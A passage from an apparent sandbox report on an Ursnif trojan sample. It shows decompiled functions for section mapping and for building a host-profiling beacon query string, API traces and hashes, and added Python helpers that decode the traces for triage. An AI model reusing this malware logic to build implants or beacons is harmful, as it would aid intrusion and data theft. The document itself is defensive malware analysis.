                          • NtMapViewOfSection.NTDLL(00000000,000000FF,05B6717E,00000000,00000000,05B6717E,?,00000002,00000000,?,05B6C71A,00000000,05B6717E,000000FF,?), ref: 05B7BEAE
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: SectionView
                          • String ID:
                          • API String ID: 1323581903-0
                          • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                          • Instruction ID: d78dd43a15d6e5ef207701320a1f262fa425d6f7f835f8d55d12034ea56dbeef
                          • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                          • Instruction Fuzzy Hash: 9EF012B690020CFFDB119FA5CC85CDFBBBDEB44244B008C69F652D1150D231AE189B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E01006D0A(void** __esi, PVOID* _a4) {
                          				long _v8;
                          				void* _v12;
                          				void* _v16;
                          				long _t13;
                          
				_v16 = 0;        // SectionOffset = 0
				asm("stosd");    // clears the slot between them (_v12)
				_v8 = 0;         // ViewSize = 0: map the entire section
				// NtMapViewOfSection(SectionHandle = ctx+0, ProcessHandle = -1 (NtCurrentProcess: this process, not a remote one),
				//   *BaseAddress, ZeroBits = 0, CommitSize = 0, &SectionOffset, &ViewSize, InheritDisposition = 2 (ViewUnmap),
				//   AllocationType = 0, Win32Protect = ctx+8, the same protection handed to NtCreateSection in E0100190C)
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6](); // ctx+0x18: the same error routine E0100190C calls when NtCreateSection fails
				}
				return 0;
                          			}

                          0x01006d1c
                          0x01006d22
                          0x01006d30
                          0x01006d37
                          0x01006d3c
                          0x01006d42
                          0x00000000
                          0x01006d43
                          0x00000000

                          APIs
                          • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0100197E,00000002,00000000,?,?,00000000,?,?,0100197E,00000000), ref: 01006D37
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: SectionView
                          • String ID:
                          • API String ID: 1323581903-0
                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                          • Instruction ID: 6c7c8c93230ffe923caba7907c670a2770ed566c9fd6435eaf0605693fa5c70d
                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                          • Instruction Fuzzy Hash: 70F030B690020CFFEB119FA5CC85CAFBBBDEB44394F10493AF252E5090D6319E588B60
                          Uniqueness

                          Uniqueness Score: -1.00%
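The NtCreateSection call in E0100190C and the NtMapViewOfSection call in E01006D0A are the two halves of the section-mapping primitive; here the view lands in the sample's own process, and the same pair with a foreign process handle is what the report's "Maps a DLL or memory area into another process" signature is about. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses the report's "APIs" lines in the exact shape printed above, decodes the arguments with the documented winnt.h / ntifs.h constants, and pairs each anonymous SEC_COMMIT section with the first view mapped after it. Treating a traced process handle of 000000FF as the current-process pseudo-handle is an inference from this page, where the trace prints 000000FF at ref 01006D37 while the decompiled call passes 0xffffffff; the sample lines are copied from E0100190C's API list.

```python
"""Decode the NtCreateSection / NtMapViewOfSection argument lists this report prints
under "APIs" into symbolic Windows constants, and pair each anonymous SEC_COMMIT
section with the view mapped from it."""
import re

# Documented constants from winnt.h / ntifs.h.
SECTION_ALL_ACCESS = 0x000F001F
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
SEC_ATTR = {
    0x00800000: "SEC_FILE", 0x01000000: "SEC_IMAGE", 0x04000000: "SEC_RESERVE",
    0x08000000: "SEC_COMMIT", 0x10000000: "SEC_NOCACHE", 0x80000000: "SEC_LARGE_PAGES",
}
VIEW_DISPOSITION = {1: "ViewShare", 2: "ViewUnmap"}

# Constructed input: the three "APIs" lines of E0100190C as printed in this report.
SAMPLE_LINES = [
    "• NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,0100459D), ref: 01001969",
    "  • Part of subcall function 01006D0A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0100197E,00000002,00000000,?,?,00000000,?,?,0100197E,00000000), ref: 01006D37",
    "• memset.NTDLL ref: 0100198B",
]

# One traced call: optional "Part of subcall function X:" prefix, Api.MODULE(args), ref: ADDR.
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)


def parse_api_line(line):
    """Return {'api', 'module', 'args', 'ref'} or None; a '?' (value not recorded) becomes None."""
    m = API_LINE.search(line)
    if not m:
        return None
    raw = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
    args = [None if a == "?" else int(a, 16) for a in raw]
    return {"api": m.group("api"), "module": m.group("module"), "args": args, "ref": m.group("ref")}


def arg(args, i):
    """i-th traced argument, or None when the trace shows '?' or stops short."""
    return args[i] if i < len(args) else None


def decode_create_section(args):
    # NtCreateSection(SectionHandle*, DesiredAccess, ObjectAttributes*, MaximumSize*,
    #                 SectionPageProtection, AllocationAttributes, FileHandle)
    access, protect, attrs, file_h = (arg(args, i) for i in (1, 4, 5, 6))
    return {
        "access": "SECTION_ALL_ACCESS" if access == SECTION_ALL_ACCESS
                  else "unknown" if access is None else hex(access),
        "protect": PAGE_PROTECT.get(protect, "unknown"),
        "attributes": [name for bit, name in SEC_ATTR.items() if attrs is not None and attrs & bit],
        # A NULL FileHandle means the section is backed by the pagefile: fresh anonymous memory.
        "backing": "pagefile" if file_h == 0 else "unknown" if file_h is None else "file %#x" % file_h,
    }


def decode_map_view(args):
    # NtMapViewOfSection(SectionHandle, ProcessHandle, BaseAddress*, ZeroBits, CommitSize,
    #                    SectionOffset*, ViewSize*, InheritDisposition, AllocationType, Win32Protect)
    proc, disp, prot = (arg(args, i) for i in (1, 7, 9))
    if proc is None:
        target = "unknown"
    elif proc in (0xFFFFFFFF, 0xFF):
        # -1 is the NtCurrentProcess pseudo-handle; this report's trace renders it as 000000FF
        # (the decompiled E01006D0A passes 0xffffffff at the same ref). Inference from this page.
        target = "current process"
    else:
        target = "foreign handle %#x" % proc
    return {"target": target,
            "disposition": VIEW_DISPOSITION.get(disp, "unknown"),
            "protect": PAGE_PROTECT.get(prot, "unknown")}


def triage(lines):
    """Pair every anonymous SEC_COMMIT section with the first view mapped after it and rate it:
    a view mapped through another process's handle is the section-based injection primitive."""
    calls = [c for c in (parse_api_line(l) for l in lines) if c]
    findings = []
    for i, c in enumerate(calls):
        if c["api"] != "NtCreateSection":
            continue
        sec = decode_create_section(c["args"])
        if sec["backing"] != "pagefile" or "SEC_COMMIT" not in sec["attributes"]:
            continue
        for m in calls[i + 1:]:
            if m["api"] != "NtMapViewOfSection":
                continue
            view = decode_map_view(m["args"])
            findings.append({
                "create_ref": c["ref"], "map_ref": m["ref"], "access": sec["access"],
                "target": view["target"], "disposition": view["disposition"],
                "severity": "high" if view["target"].startswith("foreign") else "medium",
            })
            break  # one section, one view; later maps get their own section entry
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LINES):
        print(finding)
```

On the lines from this report the result is a single medium finding (current-process mapping, ViewUnmap, SECTION_ALL_ACCESS); the page protection stays "unknown" because the trace records that argument as "?" and only the decompiled code shows it is passed through from the caller. Feeding the same function the NtMapViewOfSection lines from the 05B60000 dump would be the next step when hunting for the foreign-handle variant.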

                          APIs
                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,05B8A400), ref: 05B674C5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InformationProcessQuery
                          • String ID:
                          • API String ID: 1778838933-0
                          • Opcode ID: 1fe426cc52185ede6bf0edffb162ee476ccb7dfcbfea287f9f3399c87ed3e5fd
                          • Instruction ID: d75743181df4c65039927f378a6404f1e33cf33aacaa6ebb3dafbd9741cd3f2c
                          • Opcode Fuzzy Hash: 1fe426cc52185ede6bf0edffb162ee476ccb7dfcbfea287f9f3399c87ed3e5fd
                          • Instruction Fuzzy Hash: 97F0E2317040149FCB20CE28D889EABBFBAFB02758B104090F905DB260DB38F901CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 70%
                          			E010056C8(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
                          				intOrPtr _v4;
                          				intOrPtr _v8;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				void* _v48;
                          				intOrPtr _v56;
                          				void* __edi;
                          				intOrPtr _t32;
                          				void* _t33;
                          				intOrPtr _t35;
                          				intOrPtr _t36;
                          				intOrPtr _t37;
                          				intOrPtr _t38;
                          				intOrPtr _t39;
                          				void* _t42;
                          				intOrPtr _t43;
                          				int _t46;
                          				intOrPtr _t47;
                          				int _t50;
                          				void* _t51;
                          				intOrPtr _t55;
                          				intOrPtr _t56;
                          				intOrPtr _t62;
                          				intOrPtr _t66;
                          				intOrPtr* _t68;
                          				void* _t69;
                          				intOrPtr _t74;
                          				intOrPtr _t80;
                          				intOrPtr _t83;
                          				intOrPtr _t86;
                          				int _t89;
                          				intOrPtr _t90;
                          				int _t93;
                          				intOrPtr _t95;
                          				int _t98;
                          				intOrPtr _t100;
                          				int _t103;
                          				void* _t105;
                          				void* _t106;
                          				void* _t110;
                          				void* _t112;
                          				void* _t113;
                          				intOrPtr _t114;
                          				long _t116;
                          				intOrPtr* _t117;
                          				intOrPtr* _t118;
                          				long _t119;
                          				int _t120;
                          				void* _t121;
                          				void* _t122;
                          				void* _t123;
                          				void* _t126;
                          				void* _t127;
                          				void* _t129;
                          				void* _t130;
                          
                          				_t110 = __edx;
                          				_t106 = __ecx;
                          				_t127 =  &_v16;
                          				_t119 = __eax;
                          				_t32 =  *0x100a3e0; // 0x5299b78
                          				_v4 = _t32;
                          				_v8 = 8;
				_t33 = RtlAllocateHeap( *0x100a2d8, 0, 0x800); // executed: 0x800-byte scratch buffer the query string is appended into piece by piece
                          				_t105 = _t33;
                          				if(_t105 != 0) {
                          					if(_t119 == 0) {
                          						_t119 = GetTickCount();
                          					}
					_t35 =  *0x100a018; // 0xd4967592
					asm("bswap eax");   // the four dwords at 0x100a00c..0x100a018 are byte-swapped, so printing
					_t36 =  *0x100a014; // 0x3a87c8cd    each as 8 hex digits reproduces the 16 bytes in memory order
					asm("bswap eax");
					_t37 =  *0x100a010; // 0xd8d2f808
					asm("bswap eax");
					_t38 =  *0x100a00c; // 0x81762942
					asm("bswap eax");
					_t39 =  *0x100a348; // 0x428d5a8
					_t3 = _t39 + 0x100b62b; // 0x74666f73 = "soft": first four bytes of the format string (dword hint read little-endian)
					_t120 = wsprintfA(_t105, _t3, 2, 0x3d175, _t38, _t37, _t36, _t35,  *0x100a02c,  *0x100a004, _t119); // 0x3d175 = 250229; _t119 is the caller's value or GetTickCount()
                          					_t42 = E01006927();
                          					_t43 =  *0x100a348; // 0x428d5a8
					_t4 = _t43 + 0x100b66b; // 0x74707526 = "&upt"
					_t46 = wsprintfA(_t120 + _t105, _t4, _t42); // appended at the running offset
					_t129 = _t127 + 0x38; // cdecl clean-up for both wsprintfA calls: 0x38 / 4 = 11 + 3 arguments
                          					_t121 = _t120 + _t46;
                          					if(_a12 != 0) {
                          						_t100 =  *0x100a348; // 0x428d5a8
						_t8 = _t100 + 0x100b676; // 0x732526 = "&%s": the caller-supplied _a12 is appended as a ready-made parameter
                          						_t103 = wsprintfA(_t121 + _t105, _t8, _a12);
                          						_t129 = _t129 + 0xc;
                          						_t121 = _t121 + _t103;
                          					}
                          					_t47 =  *0x100a348; // 0x428d5a8
					_t10 = _t47 + 0x100b2de; // 0x74636126 = "&act"
                          					_t50 = wsprintfA(_t121 + _t105, _t10, 0);
                          					_t130 = _t129 + 0xc;
                          					_t122 = _t121 + _t50; // executed
                          					_t51 = E010022D7(_t106); // executed
                          					_t112 = _t51;
                          					if(_t112 != 0) {
                          						_t95 =  *0x100a348; // 0x428d5a8
						_t12 = _t95 + 0x100b8d0; // 0x736e6426 = "&dns"
                          						_t98 = wsprintfA(_t122 + _t105, _t12, _t112);
                          						_t130 = _t130 + 0xc;
                          						_t122 = _t122 + _t98;
                          						HeapFree( *0x100a2d8, 0, _t112);
                          					}
                          					_t113 = E01002A11();
                          					if(_t113 != 0) {
                          						_t90 =  *0x100a348; // 0x428d5a8
						_t14 = _t90 + 0x100b8d8; // 0x6f687726 = "&who"
                          						_t93 = wsprintfA(_t122 + _t105, _t14, _t113);
                          						_t130 = _t130 + 0xc;
                          						_t122 = _t122 + _t93;
                          						HeapFree( *0x100a2d8, 0, _t113);
                          					}
                          					_t114 =  *0x100a3cc; // 0x52995b0
                          					_a20 = E01002509(0x100a00a, _t114 + 4);
                          					_t55 =  *0x100a370; // 0x0
                          					_t116 = 0;
                          					if(_t55 != 0) {
                          						_t86 =  *0x100a348; // 0x428d5a8
						_t17 = _t86 + 0x100b8b2; // 0x3d736f26 = "&os="
                          						_t89 = wsprintfA(_t122 + _t105, _t17, _t55);
                          						_t130 = _t130 + 0xc;
                          						_t122 = _t122 + _t89;
                          					}
                          					_t56 =  *0x100a36c; // 0x0
                          					if(_t56 != _t116) {
                          						_t83 =  *0x100a348; // 0x428d5a8
						_t19 = _t83 + 0x100b889; // 0x3d706926 = "&ip="
                          						wsprintfA(_t122 + _t105, _t19, _t56);
                          					}
                          					if(_a20 != _t116) {
                          						_t123 = RtlAllocateHeap( *0x100a2d8, _t116, 0x800);
                          						if(_t123 != _t116) {
                          							E01001BE9(GetTickCount());
                          							_t62 =  *0x100a3cc; // 0x52995b0
							__imp__(_t62 + 0x40); // RtlEnterCriticalSection on the lock at ctx+0x40 (API list: ref 010058A6)
							asm("lock xadd [eax], ecx"); // atomic add on a shared counter while the lock is held
							_t66 =  *0x100a3cc; // 0x52995b0
							__imp__(_t66 + 0x40); // RtlLeaveCriticalSection (API list: ref 010058C4)
                          							_t68 =  *0x100a3cc; // 0x52995b0
                          							_t69 = E01001D33(1, _t110, _t105,  *_t68); // executed
                          							_t126 = _t69;
                          							asm("lock xadd [eax], ecx");
                          							if(_t126 != _t116) {
                          								StrTrimA(_t126, 0x100928c);
                          								_push(_t126);
                          								_t74 = E0100393C();
                          								_v20 = _t74;
                          								if(_t74 != _t116) {
									_t117 = __imp__; // lstrcpy (API list: refs 01005915, 0100591C)
									 *_t117(_t126, _v8);
									 *_t117(_t123, _v8);
									_t118 = __imp__; // lstrcat (API list: refs 01005929, 0100592D)
                          									 *_t118(_t123, _v32);
                          									 *_t118(_t123, _t126);
                          									_t80 = E0100375F(0xffffffffffffffff, _t123, _v28, _v24); // executed
                          									_v56 = _t80;
                          									if(_t80 != 0 && _t80 != 0x10d2) {
                          										E0100561E();
                          									}
                          									HeapFree( *0x100a2d8, 0, _v48);
                          									_t116 = 0;
                          								}
                          								HeapFree( *0x100a2d8, _t116, _t126);
                          							}
                          							RtlFreeHeap( *0x100a2d8, _t116, _t123); // executed
                          						}
                          						HeapFree( *0x100a2d8, _t116, _a12);
                          					}
                          					RtlFreeHeap( *0x100a2d8, _t116, _t105); // executed
                          				}
                          				return _v16;
                          			}

                          0x010056c8
                          0x010056c8
                          0x010056c8
                          0x010056dd
                          0x010056df
                          0x010056e4
                          0x010056e8
                          0x010056f0
                          0x010056f6
                          0x010056fa
                          0x01005702
                          0x0100570a
                          0x0100570a
                          0x0100570c
                          0x01005718
                          0x01005727
                          0x0100572c
                          0x0100572f
                          0x01005734
                          0x01005737
                          0x0100573c
                          0x0100573f
                          0x0100574b
                          0x01005758
                          0x0100575a
                          0x01005760
                          0x01005765
                          0x01005770
                          0x01005772
                          0x01005775
                          0x0100577b
                          0x0100577d
                          0x01005786
                          0x01005791
                          0x01005793
                          0x01005796
                          0x01005796
                          0x01005798
                          0x0100579d
                          0x010057a9
                          0x010057ab
                          0x010057ae
                          0x010057b0
                          0x010057b5
                          0x010057b9
                          0x010057bb
                          0x010057c0
                          0x010057cc
                          0x010057ce
                          0x010057da
                          0x010057dc
                          0x010057dc
                          0x010057e7
                          0x010057eb
                          0x010057ed
                          0x010057f2
                          0x010057fe
                          0x01005800
                          0x0100580c
                          0x0100580e
                          0x0100580e
                          0x01005814
                          0x01005827
                          0x0100582b
                          0x01005830
                          0x01005834
                          0x01005837
                          0x0100583c
                          0x01005847
                          0x01005849
                          0x0100584c
                          0x0100584c
                          0x0100584e
                          0x01005855
                          0x01005858
                          0x0100585d
                          0x01005867
                          0x01005869
                          0x01005870
                          0x01005888
                          0x0100588c
                          0x01005898
                          0x0100589d
                          0x010058a6
                          0x010058b7
                          0x010058bb
                          0x010058c4
                          0x010058ca
                          0x010058d2
                          0x010058d7
                          0x010058e4
                          0x010058ea
                          0x010058f6
                          0x010058fc
                          0x010058fd
                          0x01005902
                          0x01005908
                          0x0100590e
                          0x01005915
                          0x0100591c
                          0x01005922
                          0x01005929
                          0x0100592d
                          0x01005938
                          0x0100593d
                          0x01005943
                          0x0100594c
                          0x0100594c
                          0x0100595d
                          0x01005963
                          0x01005963
                          0x0100596d
                          0x0100596d
                          0x0100597b
                          0x0100597b
                          0x0100598c
                          0x0100598c
                          0x0100599a
                          0x0100599a
                          0x010059ab

                          APIs
                          • RtlAllocateHeap.NTDLL ref: 010056F0
                          • GetTickCount.KERNEL32 ref: 01005704
                          • wsprintfA.USER32 ref: 01005753
                          • wsprintfA.USER32 ref: 01005770
                          • wsprintfA.USER32 ref: 01005791
                          • wsprintfA.USER32 ref: 010057A9
                          • wsprintfA.USER32 ref: 010057CC
                          • HeapFree.KERNEL32(00000000,00000000), ref: 010057DC
                          • wsprintfA.USER32 ref: 010057FE
                          • HeapFree.KERNEL32(00000000,00000000), ref: 0100580E
                          • wsprintfA.USER32 ref: 01005847
                          • wsprintfA.USER32 ref: 01005867
                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01005882
                          • GetTickCount.KERNEL32 ref: 01005892
                          • RtlEnterCriticalSection.NTDLL(05299570), ref: 010058A6
                          • RtlLeaveCriticalSection.NTDLL(05299570), ref: 010058C4
                          • StrTrimA.SHLWAPI(00000000,0100928C,00000000,052995B0), ref: 010058F6
                          • lstrcpy.KERNEL32(00000000,?), ref: 01005915
                          • lstrcpy.KERNEL32(00000000,?), ref: 0100591C
                          • lstrcat.KERNEL32(00000000,?), ref: 01005929
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0100592D
                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 0100595D
                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0100596D
                          • RtlFreeHeap.NTDLL(00000000,00000000,00000000,052995B0), ref: 0100597B
                          • HeapFree.KERNEL32(00000000,?), ref: 0100598C
                          • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0100599A
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$wsprintf$Free$AllocateCountCriticalSectionTicklstrcatlstrcpy$EnterLeaveTrim
                          • String ID:
                          • API String ID: 2591679948-0
                          • Opcode ID: 9d9723d86d4e540f6e002e6bbcd58ad132a20815f18463f1d6999ec0b9c9aa29
                          • Instruction ID: 63739c4a0418e8483826ed25c24d61f608957e1d359c298f63f8577be4432233
                          • Opcode Fuzzy Hash: 9d9723d86d4e540f6e002e6bbcd58ad132a20815f18463f1d6999ec0b9c9aa29
                          • Instruction Fuzzy Hash: 10818C71600204EFD733EB68EC48E9A3BE8EB88714F050524F9C8D7265DA3BE904DB61
                          Uniqueness

                          Uniqueness Score: -1.00%
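The wsprintfA sequence in E010056C8 appends one fragment after another to the 0x800-byte heap buffer; the decompiler shows only the first dword at each format string's address, but that is enough to read off the parameter order. The Python below is an added example, not code from the report or from the sample: it turns the "// 0x........" hints into string fragments in call order, and demonstrates that byte-swapping the four dwords at 0x100a00c..0x100a018 makes an 8-digit hex print reproduce the 16 bytes in memory order. The hint lines and the dwords are copied from the listing above; the "%08x" width is an assumption, since the format specifiers themselves are not visible on the page.

```python
"""Read the decompiler's dword hints in E010056C8 back into the string fragments the
wsprintfA calls format with, and show what the bswap'd dwords print as."""
import re
import struct

# Constructed input: the hint lines copied from the decompiled E010056C8 above,
# in the order the calls append to the heap buffer.
SAMPLE_DECOMPILE = """
_t3 = _t39 + 0x100b62b; // 0x74666f73
_t120 = wsprintfA(_t105, _t3, 2, 0x3d175, _t38, _t37, _t36, _t35,  *0x100a02c,  *0x100a004, _t119);
_t4 = _t43 + 0x100b66b; // 0x74707526
_t8 = _t100 + 0x100b676; // 0x732526
_t10 = _t47 + 0x100b2de; // 0x74636126
_t12 = _t95 + 0x100b8d0; // 0x736e6426
_t14 = _t90 + 0x100b8d8; // 0x6f687726
_t17 = _t86 + 0x100b8b2; // 0x3d736f26
_t19 = _t83 + 0x100b889; // 0x3d706926
"""

# Constructed input: the dwords the decompiler shows at 0x100a00c, 0x100a010, 0x100a014 and
# 0x100a018, listed in memory order (the code loads them highest address first).
SAMPLE_USER_DWORDS = [0x81762942, 0xd8d2f808, 0x3a87c8cd, 0xd4967592]

# "_tN = reg + 0x100bXXX; // 0xYYYYYYYY": the offset is the string's address, the hint its first dword.
HINT = re.compile(r"\+\s*(0x[0-9a-f]+);\s*//\s*(0x[0-9a-f]+)")


def dword_hint_to_ascii(value):
    """The hint is the 32-bit little-endian word at the string's address, so packing it
    back yields the string's first (up to) four bytes; a shorter string carries its NUL."""
    return struct.pack("<I", value).rstrip(b"\0").decode("ascii", errors="replace")


def recover_format_prefixes(decompiled_text):
    """[(address, prefix), ...] in call order, i.e. the order the query string is built in."""
    return [(int(addr, 16), dword_hint_to_ascii(int(word, 16)))
            for addr, word in HINT.findall(decompiled_text)]


def bswap32(value):
    """What 'bswap eax' does: reverse the byte order of a 32-bit value."""
    return int.from_bytes(struct.pack("<I", value), "big")


def render_user_id(dwords_in_memory_order):
    """Each dword after bswap, printed as 8 lowercase hex digits. The width and case are an
    assumption about the format string, which is not visible on the page."""
    return "".join("%08x" % bswap32(d) for d in dwords_in_memory_order)


def blob_hex(dwords_in_memory_order):
    """The same 16 bytes as they sit in memory, hex-encoded without any swapping."""
    return b"".join(struct.pack("<I", d) for d in dwords_in_memory_order).hex()


if __name__ == "__main__":
    for addr, prefix in recover_format_prefixes(SAMPLE_DECOMPILE):
        print("%#x  %r" % (addr, prefix))
    rendered = render_user_id(SAMPLE_USER_DWORDS)
    print(rendered, rendered == blob_hex(SAMPLE_USER_DWORDS))
```

The recovered order is soft, &upt, &%s, &act, &dns, &who, &os=, &ip=, which is the order the fields appear in the buffer that the later lstrcpy/lstrcat calls splice into the request; only the first four bytes of each fragment are recoverable from the hints, so the full parameter names stay unknown from this page alone. The bswap check explains why the sample bothers with the swap at all: with it, the four dwords print as the raw 16-byte blob in storage order, the same string a plain hex dump of that memory would show.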

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 143 5b634ff-5b63510 144 5b63564-5b6356f 143->144 145 5b63512-5b6351e call 5b61268 call 5b7e869 143->145 146 5b63576-5b63588 call 5b72650 144->146 147 5b63571 call 5b69e82 144->147 157 5b63524-5b63531 SleepEx 145->157 154 5b6358a-5b63597 ReleaseMutex FindCloseChangeNotification 146->154 155 5b63599-5b635a0 146->155 147->146 154->155 158 5b635a2-5b635af ResetEvent CloseHandle 155->158 159 5b635b1-5b635be SleepEx 155->159 157->157 161 5b63533-5b6353a 157->161 158->159 159->159 160 5b635c0 159->160 162 5b635c5-5b635d2 SleepEx 160->162 163 5b63550-5b63562 RtlDeleteCriticalSection * 2 161->163 164 5b6353c-5b63542 161->164 165 5b635d4-5b635d9 162->165 166 5b635db-5b635e2 162->166 163->144 164->163 167 5b63544-5b6354b call 5b7e803 164->167 165->162 165->166 168 5b635e4-5b635ed HeapFree 166->168 169 5b635f3-5b635fa 166->169 167->163 168->169 171 5b63602-5b63608 169->171 172 5b635fc-5b635fd call 5b783fa 169->172 174 5b6360a-5b63611 171->174 175 5b63619-5b63620 171->175 172->171 174->175 176 5b63613-5b63615 174->176 177 5b63622-5b63623 RtlRemoveVectoredExceptionHandler 175->177 178 5b63629-5b6362f 175->178 176->175 177->178 179 5b63636 178->179 180 5b63631 call 5b69131 178->180 182 5b6363b-5b63648 SleepEx 179->182 180->179 183 5b63651-5b6365a 182->183 184 5b6364a-5b6364f 182->184 185 5b63672-5b63682 LocalFree 183->185 186 5b6365c-5b63661 183->186 184->182 184->183 186->185 187 5b63663 186->187 188 5b63666-5b63670 FindCloseChangeNotification 187->188 188->185 188->188
                          APIs
                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05B7E846), ref: 05B63528
                          • RtlDeleteCriticalSection.NTDLL(05B8A3E0), ref: 05B6355B
                          • RtlDeleteCriticalSection.NTDLL(05B8A400), ref: 05B63562
                          • ReleaseMutex.KERNEL32(000005C8,00000000,?,?,?,05B7E846), ref: 05B6358B
                          • FindCloseChangeNotification.KERNEL32(?,?,05B7E846), ref: 05B63597
                          • ResetEvent.KERNEL32(00000000,00000000,?,?,?,05B7E846), ref: 05B635A3
                          • CloseHandle.KERNEL32(?,?,05B7E846), ref: 05B635AF
                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05B7E846), ref: 05B635B5
                          • SleepEx.KERNEL32(00000064,00000001,?,?,05B7E846), ref: 05B635C9
                          • HeapFree.KERNEL32(00000000,00000000,?,?,05B7E846), ref: 05B635ED
                          • RtlRemoveVectoredExceptionHandler.NTDLL(059805B8), ref: 05B63623
                          • SleepEx.KERNEL32(00000064,00000001,?,?,05B7E846), ref: 05B6363F
                          • FindCloseChangeNotification.KERNEL32(05FBF2C8,?,?,05B7E846), ref: 05B63668
                          • LocalFree.KERNEL32(?,?,05B7E846), ref: 05B63678
                            • Part of subcall function 05B61268: GetVersion.KERNEL32(?,?,76CDF720,?,05B63517,00000000,?,?,?,05B7E846), ref: 05B6128C
                            • Part of subcall function 05B61268: GetModuleHandleA.KERNEL32(?,05FB97B5,?,76CDF720,?,05B63517,00000000,?,?,?,05B7E846), ref: 05B612A9
                            • Part of subcall function 05B61268: GetProcAddress.KERNEL32(00000000), ref: 05B612B0
                            • Part of subcall function 05B7E869: RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B7E873
                            • Part of subcall function 05B7E869: RtlLeaveCriticalSection.NTDLL(05B8A400), ref: 05B7E8AF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSectionSleep$Close$ChangeDeleteFindFreeHandleNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                          • String ID:
                          • API String ID: 1259384122-0
                          • Opcode ID: 83fb4acd2671761e5383bdf09e1d65ca548b7ac10873cc8da0fa647e500a2e93
                          • Instruction ID: cf0b1bfa08e14bc62cc641f5920df9d73126912425783ba8f99094fe01c98989
                          • Opcode Fuzzy Hash: 83fb4acd2671761e5383bdf09e1d65ca548b7ac10873cc8da0fa647e500a2e93
                          • Instruction Fuzzy Hash: 4E418431714201ABDB20BF65ED86A357BEAFB01B61BA524A6F601D7280DF78F840CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 92%
                           			// Ursnif HTTP session setup over WinINet. __esi is a connection context:
